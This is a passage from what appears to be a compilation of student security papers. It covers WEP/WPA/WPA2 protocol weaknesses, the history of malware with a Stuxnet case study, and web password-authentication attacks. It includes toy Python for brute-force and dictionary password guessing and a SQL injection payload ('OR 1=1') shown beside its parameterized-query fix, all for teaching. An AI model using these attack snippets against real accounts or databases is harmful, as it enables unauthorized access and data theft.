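# Sender: compute the tag and transmit (message, tag).
message = b"data frame payload"
tag = mac_tag(secret_key, message)

# Receiver: recompute the tag over the received message and compare.
def verify(key: bytes, message: bytes, received_tag: bytes) -> bool:
    expected = mac_tag(key, message)
    return hmac.compare_digest(expected, received_tag)   # constant-time compare

assert verify(secret_key, message, tag)                  # untampered: accepted
assert not verify(secret_key, b"tampered payload", tag)  # altered: rejected
```

Without the secret key an attacker cannot produce a valid tag for a modified message, which is exactly the guarantee the CRC-based ICV failed to provide.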
3.3
Strength:
• With the new features implemented in TKIP, WPA is more secure than WEP, since the key mixing inside TKIP increases the complexity of recovering the keys by giving an attacker substantially less data that has been encrypted under any one key. As such, the WEP key recovery attacks have been eliminated.
• Many existing attacks are discouraged by the message integrity check (MIC), broadcast key rotation, per-packet key hashing and a sequence counter.
As a result, TKIP raises the difficulty of many attacks, making wireless networks using the WPA protocol more secure than those using the WEP protocol.
3.4
Weaknesses:
Since TKIP uses the same underlying mechanism as WEP, it is consequently vulnerable to a number of similar attacks. Furthermore, due to the changes in the protocol's algorithm, weaknesses in some of the additions lead to new attacks, including the Beck-Tews attack and the Ohigashi-Morii attack.
Beck-Tews attack:
─ The Beck-Tews attack is a key-stream recovery attack that, if successfully executed, permits an attacker to transmit 7-15 packets of the attacker's choice on the network [21].
─ It is an extension of the WEP chop-chop attack: the attacker guesses individual bytes of a packet, and each correct guess is confirmed by the wireless access point, allowing the attacker to continue guessing the remaining bytes of the packet.
─ In addition, the attack is able to evade the countermeasures of the checksum mechanism and the message integrity check (MIC), so that the attacker gains access to the key stream of the packet and the MIC key for the session.
─ The attack can also circumvent WPA's replay protection by using the Quality of Service (QoS) channels.
─ As such, it can lead to attacks including ARP poisoning, denial of service, and other similar attacks.
e.g., in October 2009, Halvorsen and others made further progress, enabling attackers to inject a larger malicious packet (596 bytes, to be specific) within 18 minutes and 25 seconds [22].
Ohigashi-Morii attack:
• Japanese researchers Toshihiro Ohigashi and Masakatu Morii reported this attack, which builds on the Beck-Tews attack [23].
• The Ohigashi-Morii attack utilizes a similar attack method, but uses a man-in-the-middle attack and does not require the vulnerable access point to have Quality of Service (QoS) enabled.
4
Wi-Fi Protected Access II (WPA2)
WPA2, also known as IEEE 802.11i-2004, is the successor of WPA. It replaces WPA, which was itself an intermediate solution to the old WEP protocol. All the mandatory elements of IEEE 802.11i have been implemented in WPA2, and a new Advanced Encryption Standard (AES)-based encryption mode, CCMP, replaces the TKIP used in WPA in order to provide additional security [24].
5
Counter Mode with Cipher Block Chaining Message
Authentication Code Protocol or CCMP (CCM mode Protocol)
5.1
Background
• As an encryption protocol designed for wireless LAN products, CCMP implements the IEEE 802.11i standard, which is an amendment to the original IEEE 802.11 standard.
• CCMP is an enhanced data cryptographic encapsulation mechanism designed for data confidentiality and based upon the Counter Mode with CBC-MAC (CCM) of the AES standard [25].
• As TKIP's successor, CCMP was created to handle the vulnerabilities of TKIP in order to make wireless networks more secure [25].
5.2
Mechanisms:
• For data confidentiality, CCMP uses the counter (CTR) mode component of CCM, whereas for authentication and integrity it uses the CBC-MAC component of CCM.
• Both the MPDU data field and selected portions of the IEEE 802.11 Medium Access Control Protocol Data Unit (MPDU) header are protected by CCM.
• CCMP is based on AES processing, uses a 128-bit key and a 128-bit block size, and uses CCM with the following two parameters:
─ M = 8, indicating that the MIC is 8 octets.
─ L = 2, indicating that the Length field is 2 octets [26].
• A CCMP MPDU includes five sections:
─ The MAC header, which contains the destination and source addresses of the data packet.
─ The CCMP header, which is composed of 8 octets and consists of the packet number (PN), the Ext IV, and the key ID. CCMP uses the values of the PN, Ext IV and key ID to encrypt the data unit and the MIC.
─ The data unit, which is the data being sent in the packet.
─ The Message Integrity Code (MIC), which protects the integrity and authenticity of the packet.
─ The frame check sequence (FCS), which is used for error detection [25].
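The two CCM parameters above fix the rest of the layout by simple arithmetic (a sketch of the parameter relationships in the CCM specification; the first AES block holds one flag octet, the nonce, and the L-octet length field):

```python
BLOCK = 16          # AES block size in octets

M = 8               # MIC length in octets (CCMP setting)
L = 2               # Length-field size in octets (CCMP setting)

# The first CCM block holds 1 flag octet, the nonce, and the L-octet length
# field, so the nonce occupies whatever space remains in the 16-octet block.
nonce_len = BLOCK - 1 - L
assert nonce_len == 13          # CCMP uses a 13-octet nonce

# An L-octet length field bounds the payload a single frame can carry.
max_payload = 2 ** (8 * L)
assert max_payload == 65536     # up to 2^16 octets of data
```

Choosing L = 2 thus trades maximum frame size for a longer nonce, which is ample for 802.11 frame lengths.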
5.3
Strength:
• As the standard encryption protocol used in the WPA2 standard, CCMP is much more secure than WPA's TKIP protocol and the WEP protocol.
• For data confidentiality, CCMP ensures that only authorized parties can access the information [16].
• For authentication, CCMP provides proof of the genuineness of the user [27].
• CCMP also provides access control in conjunction with layer management [27].
• Due to the block cipher mode, CCMP is secure against attacks requiring up to 2^128 steps of operation if the encryption key is 256 bits or larger.
• As a result, CCMP addresses many of the weaknesses encountered in WPA and WEP.
5.4
Weaknesses:
• The effective strength of the key is limited to 2^(n/2) operations (n: number of bits in the key) due to the existence of generic meet-in-the-middle attacks [26].
6
Conclusions:
Every protocol has its strengths and weaknesses, because there is always a trade-off between simplicity and performance. As shown in the examples above, mechanisms that are cheap to implement tend to have severe problems that can be exploited by determined attackers. At the same time, increased complexity, as with WPA and WPA2, raises the security level of the protocol and makes the attacking process far more complicated.
After evaluating the strengths and weaknesses of each protocol, a trend clearly emerges: newly invented protocols always appear to have fewer weaknesses than those they replace. This is not necessarily because the new protocols truly have fewer weaknesses, but because those weaknesses have not yet been discovered. Just before the invention of WPA, WEP was warmly received and critiqued positively, with few known weaknesses. Consequently, as long as the core weakness of a protocol has not been discovered, it can be widely used; once it is, a new protocol with higher complexity has to be invented.
7
References:
1. Lars R. Knudsen and John Erik Mathiassen, 2004, On the Role of Key Schedules in Attacks on Iterated Ciphers
2. Arvind Doraiswamy, 2006, Palisade, http://palisade.plynt.com/issues/2006Dec/wep-encryption/
3. Peterson, W. W. and Brown, D. T., Jan 1961, Cyclic Codes for Error Detection
4. Nikita Borisov, Ian Goldberg, David Wagner, 12 Sep 2006, Intercepting Mobile Communications: The Insecurity of 802.11
5. Maria George and Peter Alfke, 30 Apr 2007, Linear Feedback Shift Registers in Virtex Devices, http://www.xilinx.com/support/documentation/application_notes/xapp210.pdf
6. Ivan Ristic, 18 Oct 2008, Net Security, http://www.net-security.org/article.php?id=1638
7. Seth Fogie, 16 Mar 2008, WPA Part 2: Weak IVs, InformIT, http://www.informit.com/guides/content.aspx?g=security&seqNum=85
8. Scott Fluhrer, Itsik Mantin, and Adi Shamir, 2001, Weaknesses in the Key Scheduling Algorithm of RC4
9. Cam-Winget, Nancy; Housley, Russ; Wagner, David; Walker, Jesse, May 2003, Security Flaws in 802.11 Data Link Protocols
10. Thom Stark, Mar 2008, WEP2, Credibility Zero, starkrealities.com
11. Business Wire, 2001, Agere Systems is First to Solve Wireless LAN Wired Equivalent Privacy Security Issue, http://findarticles.com/p/articles/mi_m0EIN/is_2001_Nov_12/ai_79954213/?tag=content;col1
12. Kevin Beaver, 10 Jan 2010, Understanding WEP Weaknesses, Wiley Publishing, http://www.dummies.com/how-to/content/understanding-wep-weaknesses.html
13. Meyers, Mike, 2004, Managing and Troubleshooting Networks, Network+, McGraw Hill, ISBN 978-0-07-225665-9
14. Bradley Mitchell, 21 Aug 2008, AES vs TKIP for Wireless Encryption, http://compnetworking.about.com/b/2008/08/21/aes-vs-tkip-for-wireless-encryption.htm
15. Edney, Jon; Arbaugh, William A., 15 Jul 2003, Real 802.11 Security: Wi-Fi Protected Access and 802.11i, Addison Wesley Professional
16. IEEE-SA Standards Board, Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications, Communications Magazine, IEEE, 2007
17. Ciampa, Mark, 2006, CWNA Guide to Wireless LANs, Networking, Thomson
18. IEEE Standards Association, 12 June 2007, IEEE 802.11, Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications
19. Wei Dai, April 2007, VMAC: Message Authentication Code using Universal Hashing, CFRG Working Group
20. Message Authentication Code, 4 Nov 2011, http://en.wikipedia.org/wiki/Message_authentication_code
21. Martin Beck and Erik Tews, Practical Attacks Against WEP and WPA, http://dl.aircrack-ng.org/breakingwepandwpa.pdf
22. Vivek Ramachandran, 25 May 2011, Wireless Lan Security Megaprimer Part 23: Wpa2-Psk Cracking, http://www.securitytube.net/video/1911
23. Toshihiro Ohigashi and Masakatu Morii, A Practical Message Falsification Attack on WPA, http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message%20Falsification%20Attack%20on%20WPA.pdf
24. Jonsson, Jakob, 15 May 2010, On the Security of CTR + CBC-MAC, http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/ccm/ccm-ad1.pdf
25. Cole, Terry, 12 June 2007, IEEE Std 802.11-2007, New York: The Institute of Electrical and Electronics Engineers, http://standards.ieee.org/getieee802/download/802.11-2007.pdf
26. Whiting, D. (Hifn); Housley, R. (Vigil Security); Ferguson, N. (MacFergus), Sep 2003, Counter with CBC-MAC (CCM), http://tools.ietf.org/html/rfc3610
27. Ciampa, Mark, 2009, Security+ Guide to Network Security Fundamentals, 3rd ed., Boston, MA: Course Technology, pp. 205, 380, 381
Malicious Software:
From Neumann’s Theory of Self-Replicating
Software to World’s First Cyber Weapon
Kaarel Nummert
School of Computing, National University of Singapore,
21 Lower Kent Ridge Road, Singapore 119077
[email protected]
Abstract. When John von Neumann was giving his lectures about the theory of self-replicating programs, only science fiction authors could have imagined how rapidly the technology of malware would develop, and that 60 years after his lectures this theory would be used to create a weapon to sabotage Iran's nuclear program.
1
Introduction
1.1
Motivation
Motivation for this project came from an essay, “The Growing Harm of Not Teaching Malware”, by George Ledin. Professor Ledin explains how current computer science students’ knowledge of malware is “roughly on a par with that of the general population of amateur computer users”. This project is an attempt to change that.
1.2
What is Malware?
The term malware, short for malicious software, is used to describe software that has hidden, hostile, intrusive or annoying functionality. Based on its functionality and purpose, malware is often categorized into computer viruses, worms, trojan horses, spyware, adware, scareware, crimeware and rootkits.
2
History of Malware
Although academic work on computer viruses began as early as 1949 with John von Neumann’s lectures on “Theory and Organization of Complicated Automata”, in which he discussed self-replicating programs, it was not until the 1970s that the first computer viruses were written and spread in public.
2.1
Pervading Animal
In January 1975, John Walker created a game called ANIMAL, which contained a subroutine PERVADE. The game itself would ask the player to answer 20 questions about the animal he is thinking about, and then try to guess which animal it is. While the user is answering the questions, the PERVADE subroutine would go through every directory accessible by the user and copy the latest version of ANIMAL into it. ANIMAL was written for UNIVAC 1108 series mainframes, and it represents the first trojan horse in the history of computers. [6]
2.2
Brain
The first computer virus to infect PC computers was written in January 1986 in Pakistan. It was named Brain after the company it was written by, Brain Computer Services. Surprisingly, the contact details of the authors of Brain were included in the source code. Since the internet as we know it today did not yet exist, the virus spread via floppy discs. Despite this seemingly inefficient method of spreading, it actually reached all over the world; one of the first calls the authors of the virus received was from Miami University. Brain infected the boot sector of floppy discs formatted with the DOS FAT file system. Although the purpose of the virus was to experiment with the security of MS-DOS, and it did not contain any destructive behaviour, once the virus had spread to a large number of computers in the United Kingdom and United States, the authors were forced to disconnect the phone numbers revealed in the virus due to an overwhelming number of phone calls. [8]
2.3
Jerusalem Virus
While ANIMAL and Brain were non-destructive viruses, the Jerusalem Virus, detected in the city of Jerusalem in October 1987, would destroy all executable files upon every occurrence of Friday the 13th. The Jerusalem Virus is known as the first computer virus that caused deliberate harm to the infected system, and it caused a worldwide epidemic in 1988 when its first trigger date, May 13th, 1988, occurred.
2.4
Viruses Become Multipartite and Polymorphic
In October 1989, Icelander Fridrik Skulason discovered Ghostball, which carried out several damaging actions on the infected system, making it the first multipartite virus. In 1990, Mark Washburn and Ralf Burger developed the Chameleon family, the first family of polymorphic viruses. Polymorphic viruses mutate themselves while maintaining the original algorithm, making themselves more difficult to discover by anti-virus software. The first widespread polymorphic virus found outside laboratories was Tequila, found in 1991.
2.5
Rootkits
In 1990, Lane Davis and Steven Dake wrote the first rootkit. The rootkit was initially named after its purpose of providing privileged (“root”) access on the UNIX operating system, but since rootkits were soon created for the Microsoft Windows and Mac OS X operating systems, the term now stands for malware that provides continuous privileged access for an attacker to the infected system. [2]
2.6
Melissa
Discovered on March 26, 1999, Melissa was the first mass-mailing macro virus. Despite not originally being designed for harm, it shut down several Internet mailing systems that couldn’t handle the load of e-mails sent by the virus to propagate itself. Melissa was not a standalone program, but part of Microsoft Office documents and spreadsheets that used the user’s contact list in Microsoft Outlook to send itself to new victims. Melissa was written by David Smith, who was initially sentenced to 10 years but only served 20 months in a federal prison and was fined $5,000. [7]
2.7
StormWorm
StormWorm was an e-mailer worm that relied on social engineering, appearing to the addressee to come from trusted contacts and carrying attached binaries or malicious code hidden in Microsoft Office attachments. Once these reached the victim’s system, they launched well-known client-side attacks on Microsoft Internet Explorer and Microsoft Office. StormWorm is a peer-to-peer botnet framework and backdoor Trojan horse that affects computers running Microsoft Windows. Discovered on January 17th, 2007, StormWorm uses a decentralized command and control technique to increase its chances of surviving, because there is no central point of control. Each infected machine knows 25 to 50 others, and therefore it is hard to track down all infected machines. Hence, StormWorm’s size was never calculated, but it is estimated to have ranged from 1 to 10 million victim systems, making it the single largest botnet herd in history. [1]
2.8
Stuxnet
Stuxnet is considered to be the most important malware in history. It was discovered in June 2010 and was the first malware that spies on industrial systems and the first to include a programmable logic controller (PLC) rootkit. What makes it even more significant is its level of sophistication and its target. It used an unprecedented four zero-day (unknown to the software developer) exploits of Windows systems, parts of it were digitally signed, an equivalent testing facility of the final target was used to test the code during development, and it was targeted to compromise Iran’s nuclear enrichment plants, which it likely succeeded in.
3
Case Study: Stuxnet
Stuxnet was not an evolution in the world of malware, but a revolution, and the world’s first real cyber weapon.
3.1
Possible Attack Scenario
Since the targets of Stuxnet were industrial control systems (ICS) operated by specialized assembly-like code on programmable logic controllers (PLC), and each PLC is configured in a unique manner, the attackers must have had the ICS’s schematics. These were possibly obtained by another malware or by an insider in the final target organization.
Analysis of Stuxnet shows that it was carefully tailored for a specific ICS. Researchers at Symantec believe the attackers must have had a mirrored environment based on the obtained schematics that included ICS hardware, PLCs, modules and peripherals to test their work on.
The malicious binaries of Stuxnet contained driver files that were digitally signed by two companies. The certificates were probably stolen by physically entering the premises of these companies, as the two companies are in close physical proximity.
The attackers behind Stuxnet targeted five organizations in Iran that they believed would help them reach their final target. Each of these initial targets was hit in a separate attack between June 2009 and June 2010. From these organizations Stuxnet spread on to other organizations on its way to its final target, a nuclear enrichment facility in Iran.
Researchers at Symantec claim that the shortest time between compilation of Stuxnet and attacking a system with the compiled result was just 12 hours. The fact that Stuxnet was not designed to spread via the internet but via infected USB memory sticks or local networks suggests that the attackers must have had immediate access to one of the initial targets.
So far researchers have managed to find three variants of Stuxnet, but they believe there is a fourth. One of the initial target organizations was attacked with all three variants, suggesting the attackers believed it to be a crucial step on their way to the final target. [3]
3.2
Discovering Stuxnet
Normally, Iran replaced up to 10 percent of its uranium-enriching centrifuges each year. At Natanz, the plant attacked by Stuxnet (as later discovered), it would have been normal to decommission about 800 per year. In early 2010, as the International Atomic Energy Agency discovered, Natanz had to replace between 1,000 and 2,000 centrifuges in a few months. Although Iran was not required to explain the reason for replacing this abnormal number of centrifuges, it was clear something had damaged them.
On June 17, 2010, Sergey Ulasen, head of the computer security firm VirusBlokAda in Belarus, received a report from a customer in Iran whose computer was in a reboot loop. VirusBlokAda got hold of the virus on the customer’s computer and quickly realized it was using a zero-day exploit in Windows Explorer to spread. The exploit allowed the virus to spread via infected USB sticks. On July 12, VirusBlokAda reported the exploit along with the virus to Microsoft. In a few days, Microsoft named the virus Stuxnet from a combination of file names found in the code (.stub and MrxNet.sys).
As computer security researchers started reverse engineering and analyzing the virus, it became clear that the virus had been released up to one year before it was discovered, and that it had been refined several times over time. Stuxnet was also discovered to use two digital certificates issued by two different companies in Taiwan, RealTek Semiconductor and JMicron Technology, both headquartered in the same business park.
Despite the use of a zero-day exploit (only a few viruses out of millions use one) and stolen certificates, Stuxnet seemed rather harmless. Experts determined that Stuxnet was designed to target Simatic WinCC Step7 software, an industrial control system by Siemens used to program the controllers that drive motors, valves and switches in various plants.
Once Stuxnet was released to computer security organizations, Nicolas Falliere, Liam O Murchu and Eric Chien, researchers at Symantec, discovered its actual sophistication. Stuxnet stored its decrypted malicious DLL files only in memory to avoid detection by antivirus software. To access these virtual DLL files, Stuxnet then reprogrammed the Windows API, a technique never seen before.
The researchers also discovered that Stuxnet was using not one but four zero-day exploits, and that it was programmed to report a detailed description of every infected system and to update the malicious software if needed. By eavesdropping on that traffic, researchers were able to determine that the majority of infected machines were located in Iran, making it clear that Iran was the centre of infection.
Further investigation revealed that once Stuxnet determined a system had Siemens Step7 software, it would replace the original commands of Step7 and disable any automated alarms that might go off as a result of the malicious commands. It also masked what was happening on the PLC by intercepting status reports sent from the PLC to the Step7 machine and removing any sign of the malicious commands.
Finally, once the Symantec researchers had released their findings, a German computer security expert, Ralph Langner, discovered that Stuxnet was not aimlessly sabotaging PLCs, but would only attack one matching a very specific configuration. It was at this point that the Stuxnet discoveries started to point towards the Natanz uranium enrichment plant described earlier. [5]
3.3
Duqu
In October 2011, computer security researchers came across a new backdoor known as Duqu. It was created by someone who had access to the source code of Stuxnet, most probably the same party that created Stuxnet, because the source code of Stuxnet has never been released; researchers and antivirus organizations only have the binaries. Unlike Stuxnet, Duqu does not target PLCs. Instead, it collects various information about the infected system to be used in future attacks, making it a precursor for future Stuxnet-like attacks. The similarities with Stuxnet are more than obvious: both viruses share a similar driver, and like Stuxnet, Duqu’s driver is signed with a stolen certificate issued by a Taiwanese company. While Stuxnet was designed to function no longer than until June 24, 2012, Duqu is reportedly designed to remove itself 36 days after infection. [4]
3.4
Aftermath
Although more than 100,000 computers in Iran, Europe and the United States have been found to be infected by Stuxnet, the actual attack was only conducted when suitable PLCs were found on the system. Although Stuxnet did not attack systems on its way to the final target, it kept a copy of itself on them in order to be able to communicate possible updates to the final target, since the target was isolated from untrusted networks. [3]
It is likely that Stuxnet succeeded in completing its initial attack, but had Stuxnet removed itself from the non-targeted systems once they were no longer needed, it might never have been discovered.
Stuxnet has started a new era in the history of malware, and one can only hope that in another 35 years it will not be looked back on as a trivial virus, the same way ANIMAL and its PERVADE subroutine are today.
References
1. Davis, M.A., Bodmer, S.M., LeMasters, A.: Hacking Exposed™ Malware & Rootkits: Malware & Rootkits Secrets and Solutions. The McGraw-Hill Companies (2010)
2. Aycock, J.: Computer Viruses and Malware. Springer Science+Business Media, LLC (2006)
3. Falliere, N., O Murchu, L., Chien, E.: W32.Stuxnet Dossier. Symantec Security Response (February 2011)
4. W32.Duqu: The precursor to the next Stuxnet. Symantec Security Response (November 2011)
5. http://www.wired.com/threatlevel/2011/07/how-digital-detectives-deciphered-stuxnet/all/1
6. http://www.fourmilab.ch/documents/univac/animal.html
7. http://en.wikipedia.org/wiki/Melissa_(computer_virus)
8. http://campaigns.f-secure.com/brain/virus.html
Password Authentication for Web Applications
Shi Hua Tan, Wen Jie Ea, Rudyanna Tan
Abstract. Web applications are vulnerable to a whole array of attacks when the
applications are insecure. This gives rise to threats to both the server and client.
In this paper, we explore the vulnerability of web applications based on the 5
most common attacks on web applications, especially the threats of
authentication hacking, highlighting the possible methods an attacker might
utilize. Our focus would be the analysis of different possible methods of
securing a web application using the different methods of password
authentication. Finally, we give an evaluation of the various methods discussed,
offering suggestions of password authentication for web developers to employ.
Keywords: Password authentication, Web application security
1 Introduction
With vulnerabilities in web applications, there exists the need for security to protect one’s sensitive data and improve one’s security posture. If a site is vulnerable, an attacker could break into the system by proving to the application that he/she is a known and valid user, thereby gaining access to whatever privileges the administrator assigned to that user. Hence, if the attacker manages to enter as an administrative user with global access to the system, he/she would have almost total control over the application together with its content.
1.1 Threats to Web Applications
Web applications offer services such as mail services, online shops, or database administration, which increase the exposed surface area by which a system can be exploited. Web applications, by their nature, are often widely accessible from the Internet, which means that there is a very large number of potential attackers. These factors have caused web applications to become a very attractive target for attackers, leading to numerous attack methods. In this paper, authentication hacking will be discussed in detail.
1.2 Authentication Hacking – What is it?
In general, an attacker first tries to gain access to the login screen, where the application requests a login and password. Next, he/she needs to enter a matching login and password that the application recognizes as correct and that has high privileges in the system, in order to gain access. Among attacks, password guessing is often one of the most effective techniques to defeat web authentication. It can be carried out either manually or via automated procedures.
1.3 Authentication Hacking – Possible Procedures
Network Sniffing. Network sniffing uses specialized hardware and software to access information that is not intended for the recipient, or to analyze networks to which individuals do not have legitimate access [7]. When information is sent over a network, it is broken up into packets, each of which contains a small amount of the information, the addresses of the receiver and sender, and some technical data. Specialized hardware or software can intercept and copy these packets. By analyzing the addresses and packet information, a person can learn about the internal network hardware and specific addresses, which may reveal a security vulnerability or a previously unknown method of entering the network. Information theft can also arise, as the packets contain small amounts of information that are lightly encoded and thus unsecured; people can open the packets and search through the data for important information.
Malicious or Weak Security Websites.
Phishing. A phishing scam is an identity theft scam carried out via email. The email appears to come from a legitimate source such as a trusted business or financial institution, and includes an urgent request for personal information, such as invoking a critical need to update an account immediately [6]. Clicking on the link provided in the email leads to an official-looking website. However, personal information provided to the site goes directly to the scam artist. People are tricked into providing personal information including credit card numbers, passwords, bank account numbers, ATM pass codes and identity numbers. Virus protectors and firewalls do not catch these phishing scams as they do not contain any suspicious code, while spam filters let them pass because they appear to come from legitimate sources.
Brute Force Attack. A brute force attack is a trial-and-error attack that cracks a
password by trying every possible combination in order to access encrypted data or
accounts without authorization [4]. A program can be used to enter all possible
password combinations, such as letter combinations, number combinations and
letter-and-number combinations, one by one, until the correct one is found. This
method of cracking is laborious but not impossible; its success depends on the length
of the password and the range of values that may appear in it. The success rate is
reduced if the account has security measures that lock it once an incorrect password
has been entered a particular number of times.
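The exhaustive search described above can be sketched in a few lines of Python. The character set, maximum length, and the `check` callback (standing in for the target system's password test) are all illustrative assumptions, not part of any real attack tool:

```python
import itertools
import string

def brute_force(check, charset=string.ascii_lowercase, max_len=4):
    """Try every candidate of up to max_len characters; `check` is a
    stand-in for the target system's password test."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            if check(candidate):
                return candidate
    return None  # search space exhausted without a match

# Toy target whose password is "abc".
print(brute_force(lambda p: p == "abc"))  # abc
```

The combinatorial growth is the attacker's obstacle: each additional lowercase character multiplies the search space by 26, which is why longer passwords and account lockouts are effective countermeasures.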
Dictionary Attack. A dictionary attack attempts to literally use every word in a
dictionary to identify the password protecting encrypted data or an account [5]. To
increase the chance of success, hackers try to use as many words as possible when
planning a dictionary attack. The words can come from a traditional dictionary, from
various technical or industry-related dictionaries and glossaries, and from
dictionaries in different languages. In addition, software can be used to mangle the
dictionary's contents, generating variations and random collections of letters; the
hacker may also mix numbers and various types of punctuation into this random mix,
making it possible to identify more complex passwords. While this approach can be
very effective when a single word is used as the password, it is much less likely to
succeed against a genuinely complicated password.
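The idea can be sketched in Python; the word list, the mangling rules, and the `check` callback below are chosen purely for illustration:

```python
def dictionary_attack(check, wordlist):
    """Try each word plus a few simple mangled variants
    (capitalization, appended digits or punctuation)."""
    for word in wordlist:
        for candidate in (word, word.capitalize(), word + "123", word + "!"):
            if check(candidate):
                return candidate
    return None

words = ["dragon", "wizard", "castle"]
print(dictionary_attack(lambda p: p == "wizard123", words))  # wizard123
```

Real cracking tools apply far richer mangling rules, but the principle is the same: many users choose passwords that are close to dictionary words.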
Pharming. Pharming is a type of Internet fraud in which the attacker attempts to
redirect Internet users from legitimate websites to fraudulent or potentially
malicious ones. It is somewhat similar to phishing [10]; pharming, however, attempts
the redirection without any bait message or other action by the user. Pharming
attacks corrupt the very process by which a user accesses Internet websites,
redirecting the user to a malicious website without the user ever knowing he/she is
under attack. This can be achieved either through a compromised Domain Name System
(DNS) server or through a compromised router or network.
Compromised Domain Name System (DNS) Server. DNS servers direct Internet users to
websites by converting textual hostnames such as www.google.com into the numerical
Internet Protocol (IP) addresses that servers recognize. By poisoning a DNS server, a
pharming attack allows an attacker to redirect large numbers of users from a
legitimate website to a malicious one, without the users ever realizing an attack has
happened [10]. The user types the correct hostname but is directed by the poisoned
DNS server to the IP address of the malicious website. That website can then either
install malicious software onto the user's computer, or appear legitimate and wait
for the user to enter private information, collecting it for fraudulent purposes.
Compromised router or network. This can be achieved through malicious software that
rewrites the firmware built into the device [10]. Firmware is the software installed
within a device itself; it manages the device's basic functions regardless of what
other hardware or software is used with it. In routers and network servers, the
firmware usually includes the setting that tells the device which DNS server to use.
A pharming attack can therefore change this firmware so that the router uses a DNS
server that is either controlled by the attacker or already poisoned. Antivirus and
firewall programs, on the whole, cannot protect users from pharming attacks; more
sophisticated measures are needed to secure network servers and routers.
Malware on Client Machines.
Spyware. Spyware consists of programs that use a user's Internet connection, normally
without his/her knowledge or permission, to send information from the personal
computer to another computer [9]. The information sent could be a record of ongoing
browsing habits, downloads, or even personal data.
Session Hijacking, Fabricated Transactions. Session hijacking happens when a third
party takes over a web user's session by obtaining the session key and pretending to
be the authorized user of that key [8]. Once the hijacker has taken over the session,
he/she can use any of the privileges of that user to perform tasks, including reading
the information passed between the original user and any other participants.
Depending on the actions taken, session hijacking may be promptly noticeable to all
participants involved or almost undetectable.
Session hijacking targets the protocols used to establish a user session. The session
ID is typically stored in a cookie or embedded in a URL, and some form of user
authentication is required to initiate the session. The hijacker can exploit defects
in the security of the network to capture this authentication information. Once in
possession of the user's identity, the hijacker can monitor every data exchange that
takes place during the session and use the data in any way he/she desires.
1.4 Vulnerability of Web Applications
While there are protective measures to identify and remove vulnerabilities, those
measures may not be well implemented or sufficient; as such, vulnerabilities still
exist in web applications. Five common web application attacks are discussed below,
in order of criticality from highest to lowest.
Remote Code Execution. Coding errors can lead to remote code execution, which allows
an attacker to run arbitrary, system-level code on the vulnerable server and retrieve
any desired information [11]. Exploitation of this vulnerability can lead to a total
system compromise with the same rights as the web server itself. This vulnerability
is difficult to discover during penetration tests, but the problems are often
revealed during a source code review.
SQL Injection. An attacker is able to retrieve crucial information from a Web
server's database through SQL injection [11]. The impact of the attack varies from
basic information disclosure to remote code execution and total system compromise,
depending on the application's security measures.
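The classic injection, and the parameterized-query defense, can be demonstrated in a few lines of Python against an in-memory SQLite database; the table, data, and attacker input are invented for the example:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

attacker_input = "' OR '1'='1"

# Vulnerable: attacker input is spliced into the SQL text, so the WHERE
# clause becomes  name = '' OR '1'='1'  -- true for every row.
query = "SELECT * FROM users WHERE name = '%s'" % attacker_input
print(conn.execute(query).fetchall())   # [('alice', 's3cret')]

# Defense: a parameterized query treats the input purely as data.
safe = conn.execute("SELECT * FROM users WHERE name = ?", (attacker_input,))
print(safe.fetchall())                  # []
```

The same principle, never splicing untrusted input into executable query text, underlies the standard mitigations in every database API.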
Format String Vulnerabilities. This vulnerability results from the use of unfiltered
user input as the format string parameter in certain Perl or C functions that perform
formatting [11]. Using specifiers such as %s, %d, %u and %x, an attacker can perform
denial of service and reading attacks, causing a program to crash or gaining
unauthorized access to information; the %n specifier additionally allows writing
attacks that edit data.
Cross-Site Scripting (XSS). An attacker crafts a URL that appears legitimate at first
glance, but when the victim opens it, the attacker can effectively execute something
malicious in the victim's browser [11].
Username Enumeration. An attacker can exploit a backend validation script that
reveals whether the supplied username is correct [11]. From the different error
messages received, the attacker can then determine which usernames are valid.
2 Password Authentication
Password authentication is the process of determining the identity of an individual
who is accessing a system. It is typically achieved via a logon process with a web
user ID or username, a password and/or an e-mail address. During setup, the user
chooses a password and a hash of that password is stored in a password file. Later,
when the user logs into the system by supplying the password, the system computes the
hash of the password entered and compares it to the stored value. If the hashes
match, the user has been authenticated; he/she can then be authorized to perform
certain actions within the system. Various password authentication methods are
discussed below.
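The store-then-compare flow just described can be sketched with Python's standard library. The salt handling and iteration count here are illustrative choices; a production system should rely on a vetted password-hashing scheme:

```python
import hashlib, hmac, os

def store_password(password: str):
    """Setup step: derive a salted hash; only (salt, hash) is stored."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
    """Login step: re-derive the hash and compare in constant time."""
    attempt = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(attempt, stored)

salt, digest = store_password("Gryffindor")
print(verify_password("Gryffindor", salt, digest))  # True
print(verify_password("Slytherin", salt, digest))   # False
```

Because only the hash is stored, a stolen password file does not directly reveal passwords, although it remains exposed to the guessing attacks described in Section 1.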
Methods of Password Authentication
HTTP Basic Authentication. Basic HTTP authentication is so called because it is
defined in the Hypertext Transfer Protocol (HTTP) standard. When a client requests a
protected resource, the server responds with the message header "WWW-Authenticate:
Basic" [24]. The web browser or client then supplies a username and password when
repeating the request: the username is concatenated with the password, separated by a
colon, and the resulting string is Base64-encoded and sent to the server, which
decodes it to recover the credentials. For instance, the username HarryPotter and
password Gryffindor would be encoded from the string 'HarryPotter:Gryffindor'.
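The HarryPotter example can be reproduced directly with Python's standard library. Note that Base64 is a reversible encoding, not encryption, which is the scheme's central weakness:

```python
import base64

username, password = "HarryPotter", "Gryffindor"
credentials = f"{username}:{password}".encode()
header = "Basic " + base64.b64encode(credentials).decode()
print(header)  # Basic SGFycnlQb3R0ZXI6R3J5ZmZpbmRvcg==

# Anyone who intercepts the header recovers the password trivially.
print(base64.b64decode(header.split()[1]).decode())  # HarryPotter:Gryffindor
```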
Implementation of Basic Authentication. A client requests access to a protected
resource. The web server returns a dialog box that asks for the username and
